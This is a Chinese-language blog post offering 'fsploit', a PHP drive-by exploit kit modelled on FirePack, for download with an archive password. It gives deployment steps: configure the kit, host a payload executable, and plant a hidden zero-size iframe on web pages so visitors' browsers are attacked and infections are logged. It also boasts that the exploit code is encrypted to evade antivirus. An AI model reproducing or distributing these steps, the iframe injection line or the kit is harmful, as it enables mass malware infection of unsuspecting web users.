仿FirePack网马管理系统fsploit
来源:LiFediy's blog
by:f3v3r
关于FirePack请参见PandaLabs在今年情人节的文章
http://pandalabs.pandasecurity.com/archive/FirePack-for-the-winter.aspx
尽管你可能看过或用过IcePack或是MPack之类的系统
不过文章提到这版本的价钱一定让你大开眼界it is really expensive compared to other kits: 3000$,将近三千元美金的高价(MPack一千元)
实际上这种智慧型网马会因应不同浏览器产生不同的漏洞做攻击,而且在加载之后会进行记录和统计分析大体上IE Firefox Opera都能感染
我模仿FirePack系统程式码(很抱歉我不是在使用简体中文的环境里所以不是做简中的介面)并将网马0day原始码部分加密
可运行通过我自己的卡巴斯基网路安全套装软体(因为在某些exploit原始码的部分有加注打论顺序)
本系统无须配置SQL资料库,纯粹使用PHP环境即可运行
大略解释下安装流程
1.先编辑config.php内容达到你要的配置,并将档案上传到网页伺服器里,要远端执行的档案放在/load/file.exe另外ref.db要CHMOD 777
2.浏览http://xxx/fsploit/admin/ 输入帐号密码进入管理介面(附图如下)
3.使用一般挂马语法挂马<iframe src=http://xxx/fsploit/index.php width=0 height=0></iframe> //挂马的src就是根目录的index.php
4.所有的exploit都已经集结完成,会按浏览者的浏览器做出不同攻击
5.坐下来,慢慢等,不用着急,谁几点几分从哪里踩中网马都记得分明
以上写到这里.
这款php程序中马率或许看起来不高,不过这种机关枪的打法比狙击枪的打法杀的更多,如果你有其他0day愿意分享我可以加到payload里,你有兴趣的话也可以自己试试看.
档案解压缩密码: f3v3r
MD5 : f82e789df8c4bccfb42b8f3276cf80c1
下载地址:
fsploit.rar